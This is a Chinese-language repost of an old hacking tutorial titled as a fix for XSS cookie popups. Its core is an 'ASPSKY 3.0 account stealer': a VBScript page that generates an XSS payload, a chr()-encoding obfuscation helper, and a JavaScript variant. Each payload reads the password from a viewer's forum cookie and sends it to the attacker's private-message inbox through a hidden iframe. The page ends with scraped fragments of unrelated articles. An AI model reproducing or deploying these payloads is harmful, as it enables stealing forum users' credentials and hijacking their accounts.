完美的解决跨站脚本的COOKIE弹框框的问题

cookie|脚本|解决|问题

先头看到欲望之翼的self.window的办法
其实我一直有个从来没给任何人说的办法:
玩了好久了公布了呵呵:
<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="rtAdjacentHTML(""beforeEnd"",""<div style=display:none&
gt;<iframe id=sendmessage></iframe></div>""):call se
ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="
& user & "&title=""+mid(document.cookie,instr(lcase(document.cookie),
""password"")+9,10)+""&message=""+""I am a goo
d boy"",""_self"")  ")" />"
form1.area.value=str
end sub

</script>
<body>
<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT>
<form name=form1>
设置发送地址:<input type=text name=loc size=50><br>
▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录
最后
不用加/)<br>
发送的用户名:<input type=text name=who size=20>-------------
<input type=button name=change value=生成代码 onclick=changeq()><br>
生成的代码:)<textarea name=area rows=10 cols=100></textarea>
</form>
</body>
</html>

搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改
然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在
论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript
写的没有双引号的问题而且可以同时写几行代码所以要实用一些!!
不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然
后全部写在一行里)

简化形式:window.open(打开的连接,窗体名,窗体大小设置)
打开的连接:
第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....
对应编码为

chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&
chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch
r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9
8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103
)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch
r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch
r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(
122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1
04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9
7)&chr(103)&chr(101)&chr(61)

不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改
对于编码看如下代码:

<html>
<script language=vbs>
sub main()
base=form1.text1.value
for i=1 to len(base)
aa=asc(mid(base,i,1))
document.write "chr(" & aa & ")" & "&"
next
end sub
</script>
<body ><form name=form1><table>
<tr><td>
<input type=text name=text1 size=40><br>
<input type=button name=button1 onclick=main() value=change>
</td></tr>
</table></form></body></html>

第二部份:为提取的COOKIE中的用户名和密码

------------------------再来一个js的放便学习----------------------------------

'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my
Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie
.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo
okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj
acentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=me
ssanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.docum
ent.location=\'

时间: 2024-09-11 08:04:53

完美的解决跨站脚本的COOKIE弹框框的问题的相关文章

完美的解决跨站脚本的COOKIE弹框的问题

cookie|脚本|解决|问题 先头看到欲望之翼的self.window的办法 其实我一直有个从来没给任何人说的办法: 玩了好久了公布了呵呵:<html> <script language=vbs> sub changeq() if form1.loc.value="" or form1.who.value="" then msgbox "没有加入地址或用户名?" exit sub end if loc=form1.loc

求大神帮忙cookie-求大神速解决怎么用cookie记录每次刷新不重头来

问题描述 求大神速解决怎么用cookie记录每次刷新不重头来 //考试时间倒计时 var maxtime = 30*60; //半个小时,按秒计算,自己调整! function CountDown(){ if(maxtime>=0){ minutes = Math.floor(maxtime/60); seconds = Math.floor(maxtime%60); msg = minutes+"":""+seconds; //document.all[&q

纯css完美地解决图片在div内垂直水平居中,兼容全部浏览器

本站提供的方法,纯css完美地解决图片在div内垂直水平居中,兼容IE7.0.IE6.0.IE5.5.IE5.0.FF.Opera.Safari...... 强烈推荐收藏! [Ctrl+A 全部选择 提示:你可先修改部分代码,再按运行]

解决win7系统右下角弹出广告的图文方法

  很多win7系统用户向小编反映,在没有运行win7系统下的任何应用程序时,系统右下角突然就弹出窗口广告,一开始以为是某些软件造成的,故此将软件卸载后测试还是出现弹出广告的问题,对于该问题我们如何解决呢?下面看小编为您提供的解决方法! 解决win7系统右下角弹出广告的图文方法 方法一: 使用360安全卫士检测并修复DNS; 方法二: 1.右键点击右下角网络图标,打开网络和共享中心,然后点击更改适配器设置; 2.找到你的本地连接,如果你使用无线那么右键点击无线连接,打开属性,然后双击 inter

解决wordpress因cookie设置错误导致密码正确无法登陆

有人遇到登陆wordpress网站时密码正确却无法登陆的情况,开始我觉得很好奇,密码正确怎么可能登陆不上呢?在对方真的确定密码正确后,翻了一些资料,果然真有这种情况出现.后面只需要一步的修改很快就解决问题了. 开文件"/wp-includes/pluggable.php",修改wp_set_auth_cookie函数. 找到694行(3.1.2版本) 将:  代码如下 复制代码 setcookie($auth_cookie_name, $auth_cookie, $expire, AD

怎么解决Win7硬盘无法弹出BitLocker解密窗口

在互联网飞速发展的时代,网络安全成为了十分严肃的话题.稍有疏忽,电脑上一些不该让人看的东西被传播开来,或许你就是下一个"陈老师"了.Windows7系统中的BitLocker功能强大,能够很好的保护硬盘,给硬盘上一把锁,拒绝隐私泄露. 可是这样,问题也就来了,我们给硬盘启用BitLocker功能之后,系统重装,或是拆卸包含有BitLocker驱动器加密的硬盘或是将硬盘移动到其它计算机上时,会出现无法解锁的情况,即右击加锁的硬盘,选择解锁驱动器,没有反应.该怎么解决这个问题呢? 解决方法

【JSP开发】解决session中cookie被禁用

大家知道,session的保存是靠cookie保存id的,但是有一些用户的浏览器设置的是"禁用cookie",那么我们用到session的网站部署上去就会影响用户访问session吗?很显然不能,所以我们要在开发阶段解决这种问题的发生. 如果cookie被禁用的话,session的id号就不会被浏览器记录,此时用户就看不到取得session页面中的session信息. 解决方法:URL路径重写. 详细点说就是,在页面1用户创建的session,并且cookie给它设定了id号,在页面2

【高手请进】:怎样解决调用迅雷组件弹出窗口

问题描述 我现调用迅雷组件下载文件,问题是要弹出那个确认窗口.问: 怎样解决或者取消这个窗口? 有什么办法可以模拟? 解决方案 解决方案二:再看一下

解决plsql连接失败,弹出空白提示框的方法详解_oracle

解决办法:1.win7下以管理员权限运行 2.修改时区      需要文件(前半部分路劲可能不同,以自己的安装路径为准):a:D:\oracle\product\10.2.0\db_1\WJLMGQS-PC_WJLMGQS\sysman\config\emd.propertiesb:D:\oracle\product\10.2.0\db_1\sysman\config\emd.propertiesc:D:\oracle\product\10.2.0\db_1\sysman\admin\suppo